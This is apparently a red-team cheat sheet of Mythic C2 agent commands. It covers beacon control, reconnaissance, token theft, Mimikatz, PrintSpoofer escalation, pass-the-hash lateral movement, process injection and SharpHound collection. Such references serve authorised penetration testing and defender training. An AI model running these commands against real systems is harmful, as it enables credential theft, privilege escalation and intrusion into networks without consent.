Mythic
Beacon Management (Real-Time C2 Control)
# Set agent to real-time communication (no sleep)
Mythic > sleep 0 0
# Instruct agent to exit
Mythic > exit
# List all running jobs
Mythic > jobs
# Kill a specific job
Mythic > jobkill [jid]
# Load additional commands into agent
Mythic > load command1 command2 ...
# Link to a peer-to-peer (SMB/TCP) agent
Mythic > link
# Unlink a linked agent
Mythic > unlinkInformation Gathering / Recon
# List network interfaces and IP addresses
Mythic > ifconfig
# List running processes
Mythic > ps
# List directory contents
Mythic > ls -Path [path]
# Print current working directory
Mythic > pwd
# Display domain controllers
Mythic > net_dclist [domain.local]
# List shares on a remote machine
Mythic > net_shares -Computer [hostname]
# Show local groups on a machine
Mythic > net_localgroup [hostname]
# Show members of a local group
Mythic > net_localgroup_member -Group [groupname] -Computer [hostname]
# View network connections
Mythic > netstat -Tcp -Udp
# Take a screenshot
Mythic > screenshotPrivilege Escalation
# Attempt to enable all possible privileges
Mythic > getprivs
# Use Mimikatz directly
Mythic > mimikatz -Command "privilege::debug"
# Steal token from a PID
Mythic > steal_token [pid]
# Impersonate a user with credentials
Mythic > make_token -username [user] -password [pass]
# PrintSpoofer to escalate to SYSTEM
Mythic > printspoofer -Command "cmd.exe"
# Revert to original token
Mythic > rev2selfLateral Movement
# Use Pass-the-Hash to run commands
Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe]
# Copy file to remote system
Mythic > cp -Path [source] -Destination [dest]
# List services or manipulate them
Mythic > sc -Query -Computer [host]
# Use PowerShell remoting (if applicable)
Mythic > powershell -Command "Invoke-Command ..." Post-Exploitation / Execution
# Run shell command
Mythic > shell whoami
# Run PowerShell in current process
Mythic > powershell -Command "Get-Process"
# Import PowerShell script
Mythic > powershell_import
# Inject PowerShell into a specific process
Mythic > psinject -PID [pid] -Command "..."
# Execute .NET assembly
Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical"
# Register .NET assembly
Mythic > register_assembly
# Execute inline .NET assembly
Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..."
# Execute unmanaged PE
Mythic > execute_pe -PE [binary.exe] -Arguments "..."
# Execute Beacon Object File (BOF)
Mythic > execute_coff -Coff [file.o] -Function [go]File Transfer
# Upload a file
Mythic > upload
# Download a file
Mythic > download -Path [path]
# Remove a file
Mythic > rm -Path [path]Last updated